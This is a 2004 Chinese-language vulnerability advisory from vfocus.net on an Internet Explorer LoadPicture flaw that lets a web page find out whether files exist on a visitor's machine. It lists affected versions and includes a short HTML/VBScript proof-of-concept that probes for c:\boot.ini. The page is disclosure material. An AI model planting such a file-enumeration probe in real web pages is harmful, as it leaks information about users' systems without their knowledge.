首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
Microsoft Internet Explorer LoadPicture文件列举缺陷
来源:vfocus.net 作者:vitter 发布时间:2004-02-21  

Microsoft Internet Explorer LoadPicture文件列举缺陷

涉及程序:
Microsoft Internet Explorer

描述:
Microsoft Internet Explorer LoadPicture文件列举缺陷

详细:

Microsoft Internet Explorer是一款流行的Web浏览器。

Microsoft Internet Explorer没有正确处理部分VBScript方法,远程攻击者可以利用这个漏洞构建恶意WEB页,诱使用户访问,可列举客户端存在的文件。

这个漏洞可通过VBScript LoadPicture方法来触发,利用这个方法可列举目标系统上的文件是否存在,造成部分敏感信息泄露。

攻击者可以构建恶意WEB页,或发送HTML形式邮件来触发。

受影响系统:
Microsoft Internet Explorer 6.0SP1
Microsoft Internet Explorer 5.5SP2
Microsoft Internet Explorer 5.5SP1
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.0.1SP3
Microsoft Internet Explorer 5.0.1SP2
Microsoft Internet Explorer 5.0.1SP1
Microsoft Internet Explorer 6.0
- Microsoft Windows XP Professional
- Microsoft Windows XP Home
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 2003 Web Edition
- Microsoft Windows 2003 Standard Edition
- Microsoft Windows 2003 Enterprise Edition 64-bit
- Microsoft Windows 2003 Enterprise Edition
- Microsoft Windows 2003 Datacenter Edition 64-bit
- Microsoft Windows 2003 Datacenter Edition
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server

攻击方法:
jelmer (jelmer@kuperus.xs4all.nl)提供了如下测试方法:

<form onsubmit="doIt(this);return false">
<input name="filename" value="c:\boot.ini" size="80" type="text"><input type="submit">
</form>

<script language="vbscript">

Sub loadIt(filename)
LoadPicture(filename)
End Sub

</script>

<script language="javascript">

function doIt(form) {

try {
loadIt(form.filename.value);
} catch(e) {
result = e.number;
}

if (result != -2146827856) {
alert('file exists');
} else {
alert('file does not exist');
}
}
</script>



解决方案:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp

附加信息:




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·Internet Explorer 未明CHM文件
·Microsoft IIS 未明远程拒绝服务
·Microsoft Internet Explorer双N
·ASP Portal 存在多个安全缺陷
·Microsoft Outlook Express任意
·Microsoft Internet Explorer未
·Cisco ONS平台多个安全漏洞
·Internet Explorer Shell:IFrame
·OpenBSD ICMPV6处理远程拒绝服务
·Microsoft Internet Explorer Bi
·Ipswitch IMail Server远程LDAP
·phpMyAdmin export.php 脚本文件
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved